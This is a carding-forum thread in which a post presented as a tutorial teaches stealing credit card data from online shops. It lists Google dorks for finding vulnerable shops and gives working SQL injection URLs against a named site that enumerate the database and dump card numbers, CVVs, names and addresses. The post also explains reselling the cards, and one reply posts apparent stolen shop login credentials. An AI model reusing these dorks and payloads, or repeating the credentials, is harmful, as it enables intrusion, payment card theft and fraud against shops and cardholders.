Cyber Security Forum
Page 1 of 3 1 23
Show 40 post(s) from this thread on one page

Cyber Security Forum (https://carders.zone/index.php)
-   Tutorials (https://carders.zone/forumdisplay.php?f=53)
-   -   Get fresh cc or $300 for 20 minutes (https://carders.zone/showthread.php?t=6202)

Honest Seller 12-25-2014 07:33 PM
Get fresh cc or $300 for 20 minutes
 
Hello dear friends, in this article I'll show you how to quickly get good valid cc, there are so many ways, from the logs of a botnet, ending wopov dumps. In this article we will examine one of the ways how to merge with cardboard shop goes online via sql injection.

1) The first step is to search for vulnerable shop. There is quite simple, the internet is full of doorways to find, here's an example dors:

Code:
InI Dork Untuk Carding
 inurl:".php?cat="+intext:"Paypal"+site:UK
 inurl:".php?cat="+intext:"/Buy Now/"+site:.net
 inurl:".php?cid="+intext:"online+betting"

 inurl:".php?id=" intext:"View cart"
 inurl:".php?id=" intext:"Buy Now"
 inurl:".php?id=" intext:"add to cart"
 inurl:".php?id=" intext:"shopping"
 inurl:".php?id=" intext:"boutique"
 inurl:".php?id=" intext:"/store/"
 inurl:".php?id=" intext:"/shop/"
 inurl:".php?id=" intext:"toys"

 inurl:".php?cid="
 inurl:".php?cid=" intext:"shopping"
 inurl:".php?cid=" intext:"add to cart"
 inurl:".php?cid=" intext:"Buy Now"
 inurl:".php?cid=" intext:"View cart"
 inurl:".php?cid=" intext:"boutique"
 inurl:".php?cid=" intext:"/store/"
 inurl:".php?cid=" intext:"/shop/"
 inurl:".php?cid=" intext:"Toys"

 inurl:".php?cat="
 inurl:".php?cat=" intext:"shopping"
 inurl:".php?cat=" intext:"add to cart"
 inurl:".php?cat=" intext:"Buy Now"
 inurl:".php?cat=" intext:"View cart"
 inurl:".php?cat=" intext:"boutique"
 inurl:".php?cat=" intext:"/store/"
 inurl:".php?cat=" intext:"/shop/"
 inurl:".php?cat=" intext:"Toys"

 inurl:".php?catid="
 inurl:".php?catid=" intext:"View cart"
 inurl:".php?catid=" intext:"Buy Now"
 inurl:".php?catid=" intext:"add to cart"
 inurl:".php?catid=" intext:"shopping"
 inurl:".php?catid=" intext:"boutique"
 inurl:".php?catid=" intext:"/store/"
 inurl:".php?catid=" intext:"/shop/"
 inurl:".php?catid=" intext:"Toys"
it is not the whole list dorok , but only a small part.
Then, after 10 minutes of searching, I found a suitable shop us http://www.hgdfoods.com

2) The second step is to search for vulnerabilities on the site to check whether sql vulnerability, simply substitute the quote at the end of the link and see if the parameter is vulnerable.
site.com/index.php?id=1 example link
site.com/index.php?id=1' example where the need to quote
Climb on the site, I found a vulnerable parameter http://www.hgdfoods.com/recipes-show.php?r=51'
We climbed this error.
Explain in detail how to twist cheekbones already no sense , since the Internet is full of different programs, with which you can easily unleash whine without having any programming skills . One of the most popular programs is havij, it is easy to download online, below I'll post a link to the latest version.
Now I 'll show you step by step how to access the database.
Twist cheekbones to know the database name.

Code:
http://www.hgdfoods.com/recipes-show.php?r=5111111111111111111111111111+UNION+SELECT+1,CONCAT(CHAR(100,100,100),CHAR(91,88,93),concat(cast(group_concat(schema_name)+as+char)),CHAR(91,88,88,93)),3,4,5,6,7,8,9,10+FROM+information_schema.schemata+++limit+0,1+--+
So it is, we know the name of your database "hgdfoods2"
learn more names of tables that inside database using this query to the database:

Code:
http://www.hgdfoods.com/recipes-show.php?r=5111111111111111111111111111+UNION+SELECT+1,CONCAT(CHAR(100,100,100),CHAR(91,88,93),concat(cast(group_concat(table_name)+as+char)),CHAR(91,88,88,93)),3,4,5,6,7,8,9,10+FROM+information_schema.tables+WHERE+TABLE_SCHEMA=0x686764666f6f647332++limit+0,1+--+
Then I noticed the table "Credit Cards", make up the database and query and get speakers that are in the table.

Code:
http://www.hgdfoods.com/recipes-show.php?r=5111111111111111111111111111+UNION+SELECT+1,CONCAT(CHAR(100,100,100),CHAR(91,88,93),concat(cast(group_concat(COLUMN_NAME)+as+char)),CHAR(91,88,88,93)),3,4,5,6,7,8,9,10+FROM+information_schema.COLUMNS+WHERE+TABLE_SCHEMA=0x686764666f6f647332+AND+TABLE_NAME=0x6372656469745f6361726473++limit+0,1+--+
We've got a column with the data on the cards.
Choose the right column and see whether there is in the shop goes online database cardboard.

Code:
http://www.hgdfoods.com/recipes-show.php?r=5111111111111111111111111111+UNION+SELECT+1,CONCAT(CHAR(100,100,100),CHAR(91,99,97,114,100,95,110,117,109,98,101,114,93),card_number,CHAR(91,99,97,114,100,95,110,117,109,98,101,114,93),CHAR(91,101,120,112,95,109,111,110,116,104,93),exp_month,CHAR(91,101,120,112,95,109,111,110,116,104,93),CHAR(91,101,120,112,95,121,101,97,114,93),exp_year,CHAR(91,101,120,112,95,121,101,97,114,93),CHAR(91,99,99,118,95,110,117,109,98,101,114,93),ccv_number,CHAR(91,99,99,118,95,110,117,109,98,101,114,93),CHAR(91,110,97,109,101,95,111,110,95,99,97,114,100,93),name_on_card,CHAR(91,110,97,109,101,95,111,110,95,99,97,114,100,93),CHAR(91,109,97,105,108,105,110,103,95,97,100,100,114,101,115,115,93),mailing_address,CHAR(91,109,97,105,108,105,110,103,95,97,100,100,114,101,115,115,93),CHAR(91,99,105,116,121,93),city,CHAR(91,99,105,116,121,93),CHAR(91,115,116,97,116,101,93),state,CHAR(91,115,116,97,116,101,93),CHAR(91,122,105,112,93),zip,CHAR(91,122,105,112,93)),3,4,5,6,7,8,9,10+FROM+hgdfoods2.credit_cards+++limit+1,1+--+
Voila! We got cardboard.
Know the number of cc in the database can be on this search.

Code:
http://www.hgdfoods.com/recipes-show.php?r=5111111111111111111111111111+UNION+SELECT+13,CONCAT(CHAR(91,88,93),count(*),CHAR(91,88,93)),13,13,13,13,13,13,13,13+FROM+hgdfoods2.credit_cards+++--+
In a database of 110 cc, if you sell this board, you can get $ 300 for a 100 cc, not bad, right? only 20 minutes of work and we have some money in your pocket.

The moral of this article so do not be lazy and you will succeed!

Click download havij.

nochurch 01-12-2015 04:15 PM
How to get vulnerable shop

zooplet 01-17-2015 08:35 PM
How do i make the havji work seems like i cant register or something.
Sorry if this sound stupid im like totally new to this.

DR4G00N 01-18-2015 05:23 AM
Quote:
Originally Posted by zooplet (Post 9107)
How do i make the havji work seems like i cant register or something.
Sorry if this sound stupid im like totally new to this.
dude you have to buy the full version for expended use,or using the free version for simple test.

DR4G00N 01-18-2015 05:28 AM
thanks Vendor for your post,

reminded me the crazy time i spent with sql injection ! :p

just for add,

with the new security measures webmasters & e-store owners are forced to not save customers credit card data in any kind of form.

thiagolima 07-12-2015 09:10 PM
thanks bro for sharing

maamoon 07-13-2015 07:27 AM
good sub bro

PugLover4578 07-29-2015 10:54 PM
Thank you for sharing. I am trying this out but I keep getting error code 301 and 302 on the shops that I find


I found this on http://www.1stopgiftshop.co.uk/

But not sure how you log in.

[email protected]
[email protected]

Username: Wayne
Password: ih8spies

Username: Cleo
Password: magpie5774

Gregory 08-02-2015 05:37 PM
Bonjour je cherche quelqu'un pour avoir des plastiques

teran1819 10-13-2015 04:44 AM
thanks


All times are GMT. The time now is 05:05 AM.
Page 1 of 3 1 23
Show 40 post(s) from this thread on one page

Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2024, vBulletin Solutions, Inc.
vB.Sponsors

Cybercrime forum, cybercrime site, ,fraud forum, russian fraud forum, Credit cards, carder, infraud, carders.ws, crdpro, fraudsters, darkpro, crdcrew, dumps, cvv, cc, stuff carding, legit seller, vendor, free cvv, dumps+pin, skimmer, ,shimmer, emv software, emv chip writer, free cc+cvv, valid cards, track 2, free cvv, dump pin, dumps, cvv, cc, credit cards, real carding, legit vendor, carder forum, carding tutorial, russian hackers, online cvv shop, track 101, enroll, fullz